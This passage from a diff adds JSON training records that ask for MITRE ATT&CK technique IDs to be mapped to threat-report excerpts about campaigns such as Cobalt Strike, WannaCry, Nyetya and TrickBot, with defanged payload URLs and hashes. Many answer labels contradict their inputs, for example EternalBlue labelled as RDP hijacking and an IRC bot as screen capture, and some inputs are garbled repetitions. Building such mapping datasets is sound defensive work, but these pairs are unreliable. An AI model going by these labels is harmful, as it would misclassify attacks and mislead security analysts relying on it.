the machine", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The RTF file contains macro codes that will execute a PowerShell command to retrieve a dynamic-link library (DLL) file before executing it using odbcconf.exe, a command-line utility related to Microsoft Data Access Components. The DLL will drop and execute a malicious JScript using regsvr32.exe, another command-line utility, to download another JScript and execute it using the same regsvr32.exe. During analysis, we received a PowerShell command that downloads Cobalt Strike from hxxps://5[.]135[.]237[.]216[/]RLxF", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1218.008: System Binary Proxy Execution - Odbcconf\n- T1218.010: System Binary Proxy Execution - Regsvr32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The SOMBRAT backdoor is packaged as a 64-bit Windows executable. It communicates with a configurable command and control (C2) server via multiple protocols, including DNS, TLS-encrypted TCP, and potentially WebSockets. The backdoor's primary purpose is to download and execute plugins provided via the C2 server. In contrast to the SOMBRAT version published in November 2020, Mandiant observed additional obfuscation and armoring to evade detection, this SOMBRAT variant has been hardened to discourage analysis. Program metadata typically included by the compiler has been stripped and strings have been inlined and encoded via XOR-based routines", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Magic Hound campaign was also discovered deploying an IRC Bot, which we have named MagicHound.Leash. We discovered this connection when we observed a DropIt sample installing a backdoor Trojan that used IRC for its C2 communications", + "output": "- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "5) Downloads the \u2018kinsing\u2019 malware and runs it 6) Uses crontab to download and run the shell script every minute 7) Looks for other commands running in cron, and if ones were identified, deletes all cron jobs, including its own. We are not certain why the attackers chose to do so, but that is what the script executes:crontab -l || sed '/update.sh/d' || crontab", + "output": "- T1053.003: Scheduled Task/Job - Cron\n- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Warzone RAT can steal credentials from the Outlook and Thunderbird email clients as shown in the image below (figure 10", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emotet could be dropping malware with Remote Access Trojan (RAT) capabilities damaging the integrity of the overall network. After reviewing systems for Emotet indicators, reimage and move clean systems to a containment VLAN, segregated from the infected network. It is possible that the Outlook account may now have rules to auto-forward all emails to an external email address, which could result in a data breach. Search base64 encoded network stream data referencing the organization\u2019s email domain. If references are found, perform additional analysis to see if a data breach has occurred", + "output": "- T1114.001: Email Collection - Local Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Attack overview . Flagpro is used in the initial stage of attacks to investigate target\u2019s environment, download a second stage malware and execute it. Flagpro communicates with a C&C server, and it receives commands to execute from the server, or Flagpro downloads a second stage malware and then executes it. Therefore, Flagpro may have already been used for attacking cases at that point. We call this sample using MFC as \u201cFlagpro v2.0\u201d and old one as \u201cFlagpro v1.0\u201d in this article. Once Flagpro is launched, it communicate with a C&C server and executes the received commands as shown in the above list. If it is not included in both Download Command fields in the command, Flagpro will not execute the main processes such as downloading, executing OS commands, collecting authentication information, and so on. If a Download Command field has \u201cExecYes\u201d, Flagpro downloads and executes the file. In requesting commands, sending execution results of OS commands or collected authentication information, Flagpro accesses a C&C server with specific URL paths and queries. Following image is an example of the response: Detections . To detect attacks using Flagpro, it is effective to create and install custom signature both on network and endpoint devices. In addition, the investigation commands after Flagpro establishes the connection with the C&C server like following are also useful for detection", + "output": "- T1069.001: Permission Groups Discovery - Local Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"If the configuration is parsed successfully, the program writes the string \"\"Meteor has started. to an encrypted log file, suggesting that the internal name of the malware is \u201cMeteor\u201c. As we will see later on in this article, another name was used in previous attacks. Throughout the entire execution of the malware, it keeps logging its actions to this same encrypted log file. Appendix C contains a helper script to decrypt the log file\"", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Alongside evidence of compromise of the organization itself, Symantec also found a copy of one of the company\u2019s own files, relating to its messaging software, on a staging server used by Chafer. The file was in a directory alongside a number of hacking tools used by the attackers", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits \u2014 given their capability to overwrite or modify parts of the kernel \u2014 makes it harder to clean compared to other malware. In addition, Skidmap has multiple ways to access affected machines, which allow it to reinfect systems that have been restored or cleaned up", + "output": "- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In January 2016 we published our analysis of a spearphishing attack against energy companies in Ukraine. That attack probably has a connection to the infamous BlackEnergy attacks in 2015 because the attackers used exactly the same mail server to send spearphishing messages. However, the attacks in January 2016 were different. Instead of using the BlackEnergy malware family, the attackers used a relatively simple open-source backdoor, written in the Python programming language, called GCat. The Python code of the GCat backdoor was obfuscated, then converted into a stand-alone executable using the PyInstaller program", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"HttpBrowser is a remote access tool whose name originates from the hard-coded \"\"HttpBrowser/1.0\"\" User-Agent. Table 2 lists the commands available to threat actors in one of the HttpBrowser variants\"", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It uses two components to avoid detection by a single component. The dropper uses an old trick in a new way: It appends the RAT to a Word document. Upon opening the document, a macro is executed that will extract the malware and execute it", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Finally, the attacker added their own devices as allowed IDs for active sync for a number of mailboxes using\u00a0Set-CASMailbox", + "output": "- T1098.002: Account Manipulation - Additional Email Delegate Permissions\n- T1098.005: Account Manipulation - Device Registration" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. and only continues if the file exists. 3) Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. 6) Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. and only continues if the file exists", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. In the case of file 8892279f3. the remote location is http://185.203.119[.]184/Dropbox/request. and only continues if the file exists. 2) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. 3) Similarly, the VBA code then writes batch code to another text file - Audio.txt. 6) Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. In the case of file 8892279f3. the remote location is http://185.203.119[.]184/Dropbox/request", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The dropped file is executed after terminating any process with the same name. For persistence, it adds a shortcut for the file at the %STARTUP% directory", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern", + "output": "- T1020: Automated Exfiltration" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Recursively generate a list of files in a directory and send to the control server - Terminate a specific process. The process is identified by the control server sending the PID to the malware", + "output": "- T1119: Automated Collection\n- T1543.003: Create or Modify System Process - Windows Service\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Upon opening the attachment, a typical luring mechanism is employed instructing the victim to enable macros, as seen in Figure 2. FireEye has observed the attackers behind this campaign using three different approaches", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After the files are encrypted the program will write a ransom note to each folder and directory on the system called read_me_unlock.txt", + "output": "- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Therefore, the Cobalt group registered domains are similar to real ones (for example, diebold.pw), and configured their email server to distribute acting as these legitimate domains (fig. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Cobalt Strike provides the ability to use the Artifact Kit framework for these purposes and even modify it, as it is distributed in the source code. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The exploit used, named EternalBlue, exploits a vulnerability in the Server Message Block (SMB) protocol which allows the malware to spread to all unpatched Windows systems from XP to 2016 on a network that have this protocol enabled. This vulnerability allows remote code execution over SMB v1. WannaCry utilizes this exploit by crafting a custom SMB session request with hard-coded values based on the target system. Notably, after the first SMB packet sent to the victim\u2019s IP address, the malware sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5", + "output": "- T1563.002: Remote Service Session Hijacking - RDP Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"This time, the text is from the novel \"\"The Brothers Karamazov\"\" by Fyodor Dostoevsky (a Russian writer). The malicious document drops a Python interpreter and PoetRAT. The author made a few changes to the PoetRAT malware, though. First, the malware uses pyminifier to obfuscate the Python script and avoid detection based on string or YARA rules: The obfuscation is a base64 and an LZMA compression algorithm. For example, the variables are stored in a \"\"Constant.py\"\" file containing the C2 server and the configuration. The most notable change is the protocol used to download and upload files\"", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attack starts with a phishing email that contains a malicious link to a file hosted on Google Docs named \u201cAnnual Bonus Report.doc\u201d. When the user clicks on the link, the TrickBot dropper downloads onto the target machine. This differs from previous TrickBot attacks we have seen, where TrickBot is usually dropped through a Microsoft Office document or by another malware like Emotet", + "output": "- T1204.002: User Execution - Malicious File\n- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Ahnlab, a South Korean software company, simultaneously published a paper regarding Bisonal's activity in South Korea. In this case, the infection vector has changed from previous samples. The initial stage is a binary that drops a decoy document (Powerpoint or Excel document), a VisualBasic script and the packed Bisonal payload. The payload is dropped with a .jpg extension that's been renamed to \"\".exe. The payload has been packed with a new packer. The code of Bisonal is similar to the version of 2019\"", + "output": "- T1137.006: Office Application Startup - Add-ins" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"This behavior is detailed later in the blog under \"\"Malware Functionality\"\". Unlike WannaCry, Nyetya does not appear to contain an external scanning component. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary. For example: The dropped .tmp executable seems to be based on Mimikatz, a popular open source tool used for recovery of user credentials from computer memory using several different techniques. The recovered credentials are then used for launching malware on the remote system using WMIC and PsExec. These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally. The two exploits drop a modified version of DoublePulsar which is a persistent backdoor running in kernel space of the compromised system. The developer modified only few bytes from the original version but this modification allowed it to evade network detection and the open source DoublePulsar scanning tools available on the Internet. The modification can be divided in 3 parts: - The attacker modified the command codes: - The attacker modified the response codes: - The attacker modified where the response code is stored in the SMB response packet. PsExec is used to execute the following instruction (where w.x.y.z is an IP address) using the current user's windows token (from the \"\"Recovery of User Credentials\"\" section above) to install the malware on the networked device. WMI is used to execute the following command which performs the same function as above, but using the current user's username and password (as username and password), retrieved from the \"\"Recovery of User Credentials\"\" section above\"", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[.]pw/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control. EmPyre is a Python post-exploitation agent built on cryptologically-secure communications and a flexible architecture", + "output": "- T1059.006: Command and Scripting Interpreter - Python" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The AppleSeed payload has an export function named \u201cDllRegisterServer\u201d which will be called when the DLL is executed using RegSvr32.exe. DllRegisterServer has a function that is responsible for performing the DLL initialization and setup that includes the following steps", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1059.007: Command and Scripting Interpreter - JavaScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Yet, both in August 2018 and 2019 Silent Librarian was lining up for the new academic years, once again targeting the same kind of victims in over a dozen countries", + "output": "- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The original malware scans the list of running process looking for outlook, iexplore or firefox. If found it injects the DLL into the process", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Download a file from a remote server - Create a text file on the local machine - Execute a file - Execute a shell (cmd.exe) command and save the results to disk - Upload the results of a previously executed shell command to a remote server", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions 